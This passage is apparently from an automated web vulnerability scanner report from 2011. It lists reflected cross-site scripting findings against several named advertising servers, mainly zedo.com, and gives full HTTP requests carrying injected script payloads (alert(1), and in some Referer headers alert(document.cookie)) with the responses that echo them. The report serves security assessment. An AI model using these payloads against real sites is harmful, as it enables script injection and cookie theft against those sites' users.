Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
Content-Length: 451
Date: Tue, 03 May 2011 15:43:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: JY57=CT; expires=Tue, 31-May-2011 15:43:26 GMT; path=/; domain=.collective-media.net
Set-Cookie: cli=11fda490a30bd5b; domain=collective-media.net; path=/; expires=Thu, 02-May-2013 15:43:26 GMT
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 02-Jun-2011 15:43:26 GMT
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rev_lee/;sz=300x250;net=cm;ord=0.3433780161396228?&291cc'-alert(1)-'8906a7a5ed8=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.3. http://a.collective-media.net/adj/cm.rev_lee/ [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.rev_lee/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 289a8'-alert(1)-'620c09b5ae1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.rev_lee/;sz=300x250;ord=0.3433780161396228?289a8'-alert(1)-'620c09b5ae1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
Content-Length: 448
Date: Tue, 03 May 2011 15:43:25 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: JY57=CT; expires=Tue, 31-May-2011 15:43:25 GMT; path=/; domain=.collective-media.net
Set-Cookie: cli=11fda490648917b; domain=collective-media.net; path=/; expires=Thu, 02-May-2013 15:43:25 GMT
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 02-Jun-2011 15:43:25 GMT
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rev_lee/;sz=300x250;net=cm;ord=0.3433780161396228?289a8'-alert(1)-'620c09b5ae1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.4. http://ad.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44b8e"><script>alert(1)</script>3f4eb266a47 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=44b8e"><script>alert(1)</script>3f4eb266a47 HTTP/1.1
Host: ad.turn.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4535108476472752264; Domain=.turn.com; Expires=Sun, 30-Oct-2011 15:41:35 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:41:34 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4535108476472752264&rnd=4463050882434824328&fpid=44b8e"><script>alert(1)</script>3f4eb266a47&nu=y&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

6.5. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1028d<script>alert(1)</script>d6377ee17ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/7426971028d<script>alert(1)</script>d6377ee17ce?d=3658195966029417970 HTTP/1.1
Host: ads.adbrite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3658195966029417970&rnd=3874368748143201778&fpid=12&nu=y&t=&sp=n&purl=
Cookie: Apache="168362123x0.728+1302188608x-1818389268"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUio2yMg1rzEsSDbLKa4xrDFQ0lFKSszLSy3KBEsr1dYCAA%3D%3D"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Tue, 03 May 2011 15:43:21 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/7426971028d<script>alert(1)</script>d6377ee17ce

6.6. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55ecc"-alert(1)-"424757d50d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1603038&55ecc"-alert(1)-"424757d50d8=1 HTTP/1.1
Host: ads.bluelithium.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1190

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:41:42 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 15:41:42 GMT
Pragma: no-cache
Content-Length: 4636
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?55ecc"-alert(1)-"424757d50d8=1&Z=1x1&s=1603038&_salt=1888351049";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array
...[SNIP]...

6.7. http://ar.voicefive.com/b/rc.pli [func parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 8d130<script>alert(1)</script>841f814715e was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction8d130<script>alert(1)</script>841f814715e&n=ar_int_p87077372&1304455353874 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; BMX_G=method->-1,ts->1304437337; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 15:42:35 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction8d130<script>alert(1)</script>841f814715e("");

6.8. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9203"%3balert(1)//01b0ff57779 was submitted in the $ parameter. This input was echoed as d9203";alert(1)//01b0ff57779 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=d9203"%3balert(1)//01b0ff57779&s=1&z=0.01697743690668352 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=0; FFChanCap=1583B1190,1#675962|0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~050311; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:d9203";alert(1)//01b0ff57779;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:13 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=121
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:41:13 GMT
Connection: close
Content-Length: 2342

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',d9203";alert(1)//01b0ff57779';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,d9203";alert(1)//01b0ff57779;z="+Math.random();}

if(zzuid=='unknown')zzuid='-SHATcGt89Z6bBFZFIn3XV-r~050311';

var zzhasAd=undefined;

var zzStr = "s=1;u=-SHATcGt89Z6bBFZ
...[SNIP]...

6.9. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b330b"%3balert(1)//6065934c827 was submitted in the $ parameter. This input was echoed as b330b";alert(1)//6065934c827 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=b330b"%3balert(1)//6065934c827&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:b330b";alert(1)//6065934c827;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675796|0,1,1;expires=Thu, 02 Jun 2011 15:40:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=CCLATcGt89YY4OotRHUqIUdE~050311;expires=Fri, 30 Apr 2021 15:40:56 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:56 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=138
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:56 GMT
Connection: close
Content-Length: 2543

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',b330b";alert(1)//6065934c827';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,b330b";alert(1)//6065934c827;z="+Math.random();}

var zzhasAd=undefined;

var zzStr = "s=1;u=unknown;z="
...[SNIP]...

6.10. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3133'%3balert(1)//414af5fb42a was submitted in the $ parameter. This input was echoed as c3133';alert(1)//414af5fb42a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=c3133'%3balert(1)//414af5fb42a&s=1&z=0.01697743690668352 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=0; FFChanCap=1583B1190,1#675962|0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~050311; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:c3133';alert(1)//414af5fb42a;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:13 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=121
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:41:13 GMT
Connection: close
Content-Length: 2342

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',c3133';alert(1)//414af5fb42a';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,c3133';alert(1)//414af5fb42a;z="+Math.random();}

if(zzuid=='unknown')zzuid='-SHATcGt89Z6bBFZFIn3XV-r~050311';

var zzhasA
...[SNIP]...

6.11. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c90d'%3balert(1)//aabec897c95 was submitted in the $ parameter. This input was echoed as 9c90d';alert(1)//aabec897c95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=9c90d'%3balert(1)//aabec897c95&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:9c90d';alert(1)//aabec897c95;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675796|0,1,1;expires=Thu, 02 Jun 2011 15:40:57 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=CSLATcGt89ZwKc5Sm87@K-RQ~050311;expires=Fri, 30 Apr 2021 15:40:57 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:57 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=137
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:57 GMT
Connection: close
Content-Length: 2543

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',9c90d';alert(1)//aabec897c95';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,9c90d';alert(1)//aabec897c95;z="+Math.random();}

var zzhasAd=undefined;

...[SNIP]...

6.12. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7764c'%3balert(1)//3563881838f was submitted in the q parameter. This input was echoed as 7764c';alert(1)//3563881838f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=7764c'%3balert(1)//3563881838f&$=&s=1&z=0.01697743690668352 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=0; FFChanCap=1583B1190,1#675962|0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~050311; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:12 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=122
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:41:12 GMT
Connection: close
Content-Length: 2339

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='7764c';alert(1)//3563881838f';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=7764c';alert(1)//3563881838f;z="+Math.random();}

if(zzuid=='unknown')zzuid='-SHATcGt89Z6bBFZFIn3XV-r~050311';

var zzhasAd
...[SNIP]...

6.13. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abc8e'%3balert(1)//755fc26b348 was submitted in the q parameter. This input was echoed as abc8e';alert(1)//755fc26b348 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=abc8e'%3balert(1)//755fc26b348&$=&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:55 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675816|0,1,1;expires=Thu, 02 Jun 2011 15:40:55 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=ByLATcGt89a8pBwW75WfG3Fi~050311;expires=Fri, 30 Apr 2021 15:40:55 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:55 GMT
Connection: close
Content-Length: 2261

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='abc8e';alert(1)//755fc26b348';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=abc8e';alert(1)//755fc26b348;z="+Math.random();}

var zzhasAd=undefined;

...[SNIP]...

6.14. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ff81"%3balert(1)//ead3d160fc3 was submitted in the q parameter. This input was echoed as 5ff81";alert(1)//ead3d160fc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=5ff81"%3balert(1)//ead3d160fc3&$=&s=1&z=0.01697743690668352 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=0; FFChanCap=1583B1190,1#675962|0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~050311; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:12 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
